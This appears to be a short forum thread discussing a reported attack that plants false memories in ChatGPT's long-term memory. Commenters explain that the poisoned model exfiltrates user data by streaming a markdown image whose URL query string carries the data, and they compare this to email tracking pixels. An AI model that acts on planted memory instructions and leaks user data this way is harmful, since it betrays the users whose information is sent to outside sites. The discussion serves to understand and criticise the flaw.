tldr
- it affects the desktop app of chatgpt, but likely any client that features long term memory functionality.
- does not apply to the web interface.
- does not apply to API access.
- the data exfiltration is visible to the user as GPT streams the tokens that form the exfiltration URL as a (fake) markdown image.
false memories in ChatGPT
That’s … really bad.
How is the application able to send data to any website? Like even if you as the legit user explicitly asked it to do that?
Haven’t read details, but the classic way is to have a system visit: site.com/badimage.gif?data=abcd
Note: That s is also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.
This is why every single email client for the past 2+ decades blocks external images? This didn’t occur to the AI geniuses?
IME they usually proxy and/or prefetch images for caching instead of blocking them. Only spam content is blocked by default.
I don’t understand. Why can’t ChatGPT be a good bot and keep a secret?